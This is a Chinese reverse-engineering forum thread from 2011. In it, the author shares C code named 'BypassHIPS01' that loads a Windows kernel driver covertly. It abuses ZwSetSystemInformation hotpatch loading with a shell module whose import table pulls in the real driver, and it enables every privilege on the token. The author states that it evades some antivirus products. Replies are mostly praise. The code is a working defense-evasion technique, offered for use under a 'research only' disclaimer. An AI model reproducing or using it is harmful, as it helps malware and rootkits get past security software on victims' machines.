
[分享]利用系统Hotpatch加载驱动的一种比较取巧的方法

2011-12-21 04:25 13010
cvcvxk
10

其实没啥可讲,也没啥可说的,这段代码同样是很老的代码,只是一直没放出来的原因是为了保持互联网和谐,但是都快圣诞了,还是放一下吧~
首先这是一个基于ZwSetSystemInformation 加载驱动的方法,
其次这是一个只被部分杀毒拦截的方法——别指望这个能过360,因为mj早知道这个~
然后说一下为啥是取巧,因为这是利用MmLoadSystemImage对驱动文件处理时,会自动加载并执行文件导入表中的其他驱动,于是你懂的。(具体参考我那篇ZwLoadDriver的文章:http://bbs.pediy.com/showthread.php?t=142021)

最后上代码

//Jan 4 2005
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)
{
        // Adjust one named privilege on the current process token.
        //
        // bEnable: TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
        // Name:    privilege name (SE_*_NAME) passed to LookupPrivilegeValue.
        //
        // Returns TRUE only when the privilege was resolved and
        // AdjustTokenPrivileges both succeeded and left GetLastError() at
        // ERROR_SUCCESS; a call that succeeds but reports
        // ERROR_NOT_ALL_ASSIGNED therefore counts as failure.
        // The token handle is closed on every path.
        HANDLE hToken = NULL;
        TOKEN_PRIVILEGES tp;
        BOOL ok = FALSE;

        if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
                return FALSE;
        }

        tp.PrivilegeCount = 1;
        tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

        // Only attempt the adjustment once the LUID has been resolved.
        if (LookupPrivilegeValue(NULL, Name, &tp.Privileges[0].Luid)) {
                BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
                // GetLastError() is read before CloseHandle so it still
                // reflects AdjustTokenPrivileges.
                ok = adjusted && GetLastError() == ERROR_SUCCESS;
        }

        CloseHandle(hToken);
        return ok;
}

//Jan 4 2005
//Enable all privileges, return the number of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable)
{
        // Enable (or disable) a fixed list of privileges on the current
        // process token and report how many adjustments succeeded.
        //
        // bEnable: forwarded to EnableSpecificPrivilege for every entry.
        //
        // Returns the count of privileges for which EnableSpecificPrivilege
        // returned TRUE. Failures are not reported individually.
        //
        // The list is adjusted in the same order as the original unrolled
        // call sequence.
        static LPCTSTR const kPrivilegeNames[] = {
                SE_ASSIGNPRIMARYTOKEN_NAME,
                SE_AUDIT_NAME,
                SE_BACKUP_NAME,
                SE_CHANGE_NOTIFY_NAME,
                SE_CREATE_PAGEFILE_NAME,
                SE_CREATE_PERMANENT_NAME,
                SE_CREATE_TOKEN_NAME,
                SE_DEBUG_NAME,
                SE_INC_BASE_PRIORITY_NAME,
                SE_INCREASE_QUOTA_NAME,
                SE_LOAD_DRIVER_NAME,
                SE_LOCK_MEMORY_NAME,
                SE_PROF_SINGLE_PROCESS_NAME,
                SE_REMOTE_SHUTDOWN_NAME,
                SE_RESTORE_NAME,
                SE_SECURITY_NAME,
                SE_SHUTDOWN_NAME,
                SE_SYSTEM_ENVIRONMENT_NAME,
                SE_SYSTEM_PROFILE_NAME,
                SE_SYSTEMTIME_NAME,
                SE_TAKE_OWNERSHIP_NAME,
                SE_TCB_NAME,
                SE_UNSOLICITED_INPUT_NAME,
                SE_MACHINE_ACCOUNT_NAME,
        };
        DWORD enabled = 0;
        size_t i;

        for (i = 0; i < sizeof(kPrivilegeNames) / sizeof(kPrivilegeNames[0]); i++) {
                // EnableSpecificPrivilege yields TRUE (1) or FALSE (0), so
                // summing the results counts the successful adjustments.
                enabled += EnableSpecificPrivilege(bEnable, kPrivilegeNames[i]);
        }

        return enabled;
}
//Mar 7 2006
BOOL BypassHIPS01()
{
        // Loads a kernel module through ZwSetSystemInformation's
        // SystemHotpatchInformation class instead of the usual service /
        // NtLoadDriver route. Per the post text, the file handed to the kernel
        // is an empty shell whose import table pulls in the real driver.
        //
        // Returns TRUE when ZwSetSystemInformation returns
        // STATUS_INVALID_IMAGE_FORMAT (the author treats this as "the image
        // was processed"); returns FALSE when the export cannot be resolved
        // or any other status comes back.
        //
        // Audit notes: the routine enables every privilege it can on its own
        // token, resolves ZwSetSystemInformation by name from ntdll, echoes
        // the module path via OutputDebugStringW, and submits a hotpatch
        // request with HOTP_KERNEL_MODULE set. Each of these steps is visible
        // to monitoring that watches token adjustments, ntdll export lookups,
        // debug output, or this information class.
        
        // Hotpatch info block followed inline by the module path; the kernel
        // finds the path through NameOffset, computed below relative to shci.
        // SYSTEM_HOTPATCH_CODE_INFORMATION comes from the header attached to
        // the post (not shown here). `s` is not zero-initialised, so any
        // shci fields not assigned below hold indeterminate values.
        struct {
                SYSTEM_HOTPATCH_CODE_INFORMATION shci;
                WCHAR KernelPath[MAX_PATH];
        } s;
        WCHAR FileName[MAX_PATH];
        WCHAR RealSysName[MAX_PATH];
        // Return value (number of privileges enabled) is ignored, so a
        // partially privileged token is not detected here.
        EnableAllPrivilege(TRUE);
        // Resolved at run time; the NULL case is handled by the check below.
        ZWSETSYSTEMINFORMATION pNtSetSystemInformation=(ZWSETSYSTEMINFORMATION)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "ZwSetSystemInformation");
        //LPTHREAD_START_ROUTINE pLdrHotPatchRoutine = (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "LdrHotPatchRoutine");
        // Directory of the running executable. The return value is not
        // checked, so truncation is not detected, and wcsrchr's result is
        // dereferenced without a NULL check.
        GetModuleFileNameW(NULL,FileName,MAX_PATH);
        (wcsrchr(FileName, L'\\'))[0] = L'\0';
        OutputDebugStringW(FileName);
        // NT-namespace path to HotpatchSys.sys next to the executable.
        // StringCb* sizes are in bytes, so MAX_PATH here limits the write to
        // half of RealSysName rather than the whole buffer.
        StringCbPrintfW(RealSysName,MAX_PATH,L"\\??\\%s\\HotpatchSys.sys",FileName);
        OutputDebugStringW(RealSysName);
        if(pNtSetSystemInformation)
        {
                // Apply a kernel-mode patch sourced from a module file.
                s.shci.Flags = HOTP_USE_MODULE | HOTP_PATCH_APPLY|HOTP_KERNEL_MODULE;
                // Size covers the header and the trailing path buffer.
                s.shci.InfoSize = sizeof(s);
                // Byte offset of KernelPath from the start of shci.
                s.shci.KernelInfo.NameOffset=(WORD)((ULONG_PTR)s.KernelPath -(ULONG_PTR)&s.shci);
                // Byte length of the path, assuming 2-byte WCHAR and no
                // terminator. (Field spelling "NameLegth" follows the attached header.)
                s.shci.KernelInfo.NameLegth=2*wcslen(RealSysName);
                // Same byte/char size mix-up as above: limit is MAX_PATH bytes.
                StringCbCopyW(s.KernelPath,MAX_PATH,RealSysName);
                OutputDebugStringW(s.KernelPath);
                //_tprintf(_T("Flags:%x,Size:%x,Offset:%x,NameLegth:%x\r\n"),s.shci.Flags,s.shci.InfoSize,s.shci.KernelInfo.NameOffset,s.shci.KernelInfo.NameLegth);
                //s.shci.UserModeInfo.NameOffset = (WORD)((ULONG_PTR)s.SourceName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.NameLegth = sizeof(SOURCE_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.TargetNameOffset = (WORD)((ULONG_PTR)s.TargetName -(ULONG_PTR)&s.shci);
                //s.shci.UserModeInfo.TargetNameLegth = sizeof(TARGET_NAME)-sizeof(WCHAR);
                //s.shci.UserModeInfo.PatchingFinished = FALSE;
                //lstrcpynW(s.SourceName, SOURCE_NAME, sizeof(s.SourceName));
                //lstrcpynW(s.TargetName, TARGET_NAME, sizeof(s.TargetName));
               // hThread = CreateThread(NULL, 0, pLdrHotPatchRoutine, &s, 0, NULL);
               // WaitForSingleObject(hThread, INFINITE);
               // CloseHandle(hThread);
                NTSTATUS x = pNtSetSystemInformation(SystemHotpatchInformation,&s,sizeof(s));
                // Per the author's explanation in the post, the shell module
                // is rejected as an invalid image only after its imports have
                // been processed, so this status is taken as success.
                if (x==STATUS_INVALID_IMAGE_FORMAT)
                {
                        return TRUE;
                }
        }
        return FALSE;
}

加载的hotpatch.sys其实是一个空壳,真正的驱动是由它的导入表导入的某个内核动态库驱动~
需要的hotpatch定义用的头文件在本帖的附件里给出~
HotPatch.rar

严重声明:本帖给出的代码仅供研究学习之用,如果用在他途,各种后果与本人无关。

欢迎交流,QQ群:171797360


上传的附件:
最新回复 (22)
MRCDG 2011-12-21 08:28
2
0
沙发,前排留名
pigdefeet 2011-12-21 09:09
3
0
马扎凑热闹马扎凑热闹
xss 4 2011-12-21 09:10
4
0
多谢V大给菜鸟科普.............................
windowsa 2011-12-21 09:12
5
0
楼主就是经常搞免杀和D的那位?
gezz 2011-12-21 10:03
6
0
果断前排占老V广告位,老V神作2005年~~
Fido 2011-12-21 10:18
7
0
膜拜啊.................................
痞子辉 1 2011-12-21 10:28
8
0
膜拜啊.................................
fhurricane 1 2011-12-21 10:31
9
0
来膜拜老V了!!!
smilediy 2011-12-21 10:37
10
0
06年的代码
skypismire 1 2011-12-21 10:39
11
0
长见识阿.
cvcvxk 10 2011-12-21 11:05
12
0
话说,我从来不搞免杀和D。
我的职业是超自然学研究人员。
zuoyefeng 2011-12-21 11:25
13
0
顶老v爆鸟~~~~~~~~~
miaoling 2011-12-21 11:30
14
0
果断过来膜拜……
liein 2011-12-21 12:23
15
0
终于有人公布了...... 顶 ...
cvcvxk 10 2011-12-21 14:32
16
0
不是终于,而是圣诞节与新年的提前爆料
byexe 2011-12-21 14:43
17
0
占坑  大家占坑
yanghh 2011-12-21 15:16
18
0
好东西 顶。。。
wowocock 1 2011-12-22 14:20
19
0
该把老V抓起来。
mszjk 2011-12-23 03:36
20
0
赶来膜拜...
djxh 2011-12-23 05:18
21
0
学习123456
kmsmxpro 2011-12-23 08:37
22
0
好东西 顶。。。
ylautyboy 2012-2-23 15:37
23
0
膜拜啊.................................